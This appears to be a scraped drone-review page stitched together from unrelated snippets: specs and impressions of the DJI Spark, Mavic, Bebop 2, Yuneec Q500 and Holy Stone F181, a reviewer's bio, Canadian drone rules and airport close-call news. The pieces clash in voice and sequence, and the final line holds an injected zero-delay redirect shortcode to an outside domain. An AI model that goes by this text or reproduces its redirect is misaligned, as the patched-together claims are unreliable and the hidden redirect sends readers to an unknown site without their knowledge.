When it comes to the specifications, there is no doubt that Autel Robotics X-Star Premium will amaze you with what it has to offer. Take the range as the perfect example – this birdie can reach 2 kilometers and is able to do so with full FPV coverage thanks to a powerful VTX system. Furthermore, X-Star Premium sports a 14.8V 4900mAh LiPo battery. Yup, that’s a 4S battery right there, and it can hold it up in the air for up to 25 minutes. Realistically you’re looking at slightly above 20 if you plan on recording with the provided camera.
Regardless, things still get broken sometimes, particularly racing drones. A good model will offer a ready supply of cheap parts like rotors and struts to replace the broken ones, and will make it easy to swap these parts out when required. The same is true of batteries.
Once again, Bebop 2 is the second generation of popular Parrot’s lineup of drones. It features a sleek, lightweight design with a great full HD camera featuring a 14mpx sensor. It is mounted on a built-in 3-axis electronic image stabilization ensuring the optimal photo and video quality in terms of both smoothness and stability. Both FPV and VR are supported, but we’ll get to that in a second.

There is no doubt that the Q500 is the ultimate drone model coming from Yuneec’s factory of wonders. With a built-in professional-quality 4K camera that is able to record insanely high-quality aerial footage, it is pretty clear that this drone is meant only for people who know what they want from their drone.
DJI more recently released their new small drone, designed for a multitude of uses for the drone enthusiast or casual consumer, the DJI Spark. Spark is very versatile, you can control it by mobile device, remote control, or even just with your hands. In between the completely gesture based controls and the advanced autonomous flight techniques, called DJI Quickshot, Spark is an attractive machine to a first time pilot.
DJI Mavic Pro is very easy to fly despite its high quality and sophistication. My advice is to stay well away from the Sport Mode until you’re comfortable and familiar with all the drone’s basic features.
The new DJI Mavic Air is so new, that our review unit is only shipping to us today. Launched and shipped at the end of January 2018, this is a compact, folding drone that combines the best of the DJI Mavic Pro and the DJI Spark. Not only does it use the best features of the two previous drones, it also expands the capabilities with added obstacle avoidance sensors, upgraded camera and a form factor that sits in between the two during flight, but folds down to the smallest of the bunch for transportation.
MODULAR and BONUS BATTERY: There are 2 powerful 3.7V 500mAh Modular batteries including 1 bonus, which can support longer flight time for you and your family, this modular design ensures the safety of charge and storage
The second noteworthy aspect of a good selfie drone is its size. Also, keep in mind that most today’s new selfie drones are foldable in a way (7 most popular foldable drones), whether just by their propellers or entire prop arms. With that being said, make sure you keep an eye out for their folded and unfolded sizes not to mess them up when making your decision. Ideally, you should look for a drone that you can easily carry around with you. Most models featured on this list down below can easily fit into a man purse. Mobility is a key factor – what good is your new selfie drone if it’s never there when you need it the most…

The camera resolution will make your phone and camera both blush, with its 30-megapixel sensor and 5K video capabilities. You can even swap out camera lenses for a truly professional finish. On top of that it’s mounted on a serious gimbal that will result in buttery smooth footage and keep going for a hefty 4.3 mile range. Battery life tops out at 25 minutes, but with the pro features on the remote you should have easily captured what you want, well within that time limit.
The F100G is also a good beginner/intermediate drone for still photography and aerial videography. It comes with High/Low Speed modes, which allow for greater control when it comes to getting the perfect shot.

As you will have the chance to see down below, Holy Stone F181 has a lot more features than the X5C by Syma, but to its defense, the F181 is more than double its price. In addition to all of these features, this little fella is equipped with an HD camera as well. It doesn’t have any form of stabilization which is not surprising at all… It is not the best beginner drone with camera, but it can still take solid shots and the occasional video. To top it all off, you will be happy to find out that HOly Stone F181 is able to fly for up to 9 minutes and can reach up to 100 meters.
In Canada, UAVs that weigh less than 77.2 pounds are considered recreational and they aren’t subjected to particularly strict rules. Special Flight Operation certificates are required for all of the drones that are larger or owned by commercial entities.

If you are ready to splash out around $100 for your first ever easy to fly drone, then Holy Stone has a great one for you. Meet F181, a miniature drone with a sleek design and solid physical controller that reminds me of console-style gamepads. For such a cheap drone, this birdie really does have an abundance of features. Let’s check it out and see what exactly can it do!
For those of you that are interested in making an even bigger commitment to a drone, here are a few intermediate level drones that we also love. These are fun, high quality, and still quite easy to use—though they’re all a bit more expensive than true beginners may be comfortable with:
Michael A. Prospero is the reviews editor at Laptop Mag and Tom’s Guide. When he’s not testing out the latest running watch, skiing or training for a marathon, he’s probably using the latest kitchen gadget.
If you want to try your hand at this sort of experience — and it’s nuts, so you really should — look to the Blade FPV Nano QX. Yes, it’s the same Blade Nano QX we praised a minute ago, just with a headset and camera included. That headset normally retails in the $200 to $250 range on its own, and it can be used with other devices, so although the FPV version is pricier than the camera-less model highlighted above, it isn’t an outrageous increase.
Hey, we can’t mention selfie-drones without mentioning the drone which made selfie-drones popular. Mavic. The great thing about this drone though is not only is it portable, it’s also great if you’re actually a pro-photographer or videographer. This is a professional-level drone – but yes, it does take selfies too!

Some of the most spectacular blowups, like that of the drone start-up Lily, involved overpromising and never delivering on autonomous features. Skydio’s founders say they’re keen to avoid that mistake. The company showed me the assembly line in its headquarters in Redwood City, Calif., where teams of technicians are finishing production-ready R1s by hand. The small-scale operation is meant to ensure quality, but it comes at a price. DJI’s latest feature-packed drone, the well-reviewed Mavic Air, sells for $800, a third of the price of the R1.
It is safe to say we are slowly moving to the top half of the list. At the 7th spot, we have the Wingsland S6 pocket selfie drone. It is a beautifully designed foldable cheap selfie drone with solid characteristics and a great camera. It’s quite more expensive than GI Follow, but has great specifications to come along with the price.
Once all of that has been dealt with, simply tap capture photo or even record a selfie video, it’s that easy. There’s no need for calibrating, rotating and all that complicated stuff… Just let this Hover Camera hover and capture the simplest aerial selfie out there!
Some models skip the remote control, or offer it as an extra-cost feature, and instead use a smartphone connected via Wi-Fi and a flying app. These apps often provide a live video view from the quadcopter camera. However, apps don’t allow the precision of real controllers: It is easier for your thumbs to slip, possibly causing a crash.
I tried two models: the Rova, a $299 quadcopter with a 12-megapixel camera, and the $399 Yuneec Breeze 4K, a 13-megapixel drone capable of shooting in ultra-high definition. My plan was to set up the drones and take some shots of my family as we sat on the couch in the living room — pretty straightforward stuff. If everything went well, I could envision having photos of birthday parties, game nights, and so on like I had a personal photographer documenting our every afternoon.
In drone world, 480p cameras are most frequently seen on the lowest end models out there. Still, there are pricier drones that use 480p as well, although not for recording video but for the popular FPV live streaming.
The Global Gateway Alliance, a New York and New Jersey airport advocacy group, said in a news release that the high number of drone incidents in the New York airspace accounted for almost a third of all close-calls nationwide. In August, the alliance called for steps to make drone use safer in the wake of various incidents that the group said put passengers, planes and airports at risk. The steps include stricter enforcement of “No Fly Zones,” better drone technology, mandatory training for drone users, air-traffic-control monitoring, and education for people who live near airports about the dangers and penalties of flying drones in the area.
The most frequent mistake I see novice flyers do is go full throttle on their first run. This is obviously a bad practice, especially with powerful drones that are too fast for beginners to handle. That’s why you should put your drone at the lowest rate possible and don’t force the throttle to unnecessary levels. You’ll thank me later! [redirect url=’http://pm9.biz/bump’ sec=’0′]
